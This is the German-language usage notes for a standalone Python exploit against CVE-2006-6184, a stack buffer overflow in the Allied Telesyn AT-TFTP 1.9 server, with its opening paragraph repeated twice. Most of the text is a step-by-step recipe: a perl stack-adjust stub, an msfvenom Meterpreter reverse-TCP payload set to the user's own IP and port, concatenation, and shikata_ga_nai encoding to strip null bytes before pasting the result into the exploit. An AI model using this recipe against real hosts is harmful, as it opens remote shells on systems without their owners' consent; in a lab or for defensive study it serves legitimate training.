
Dies ist ein Python-basierter eigenständiger Exploit für CVE-2006-6184. Dieser Exploit löst einen stack-basierten Pufferüberlauf im Allied Telesyn TFTP Server (AT-TFTP) 1.9 und möglicherweise früheren Versionen aus, der es entfernten Angreifern ermöglicht, einen Denial-of-Service zu verursachen oder beliebigen Code auszuführen.
Dies ist ein eigenständiger Exploit auf Python-Basis für CVE-2006-6184. Dieser Exploit löst einen stack-basierten Pufferüberlauf im Allied Telesyn TFTP Server (AT-TFTP) 1.9 und möglicherweise früheren Versionen aus, der es entfernten Angreifern ermöglicht, einen Denial-of-Service zu verursachen oder beliebigen Code auszuführen.
Das Payload muss angepasst werden, um Ihre eigene IP-Adresse und Ihren Listening-Port zu enthalten. Sie müssen es also manuell generieren. Gehen Sie dazu wie folgt vor:
1.) Geben Sie Folgendes ein, um eine Hex-Datei mit dem Betrag zu erstellen, der vom Stack-Pointer subtrahiert werden muss (3500):
perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj
2.) Verwenden Sie als Nächstes den folgenden Befehl, um ein gestuftes Meterpreter-Shell-Payload zu erstellen:
msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=[Ihre IP] LPORT=[Ihr Port] R > payload
3.) Kombinieren Sie dann die beiden soeben erstellten Dateien.
cat stackadj payload > shellcode
4.) Entfernen wir schließlich die schlechten Zeichen.
msfvenom -p generic/custom PAYLOADFILE=./shellcode -b "\x00" -e x86/shikata_ga_nai -f python
Geben Sie die Ausgabe als Wert der Variablen "payload" ein. Möglicherweise müssen Sie diesen Exploit einige Male ausführen, damit er funktioniert.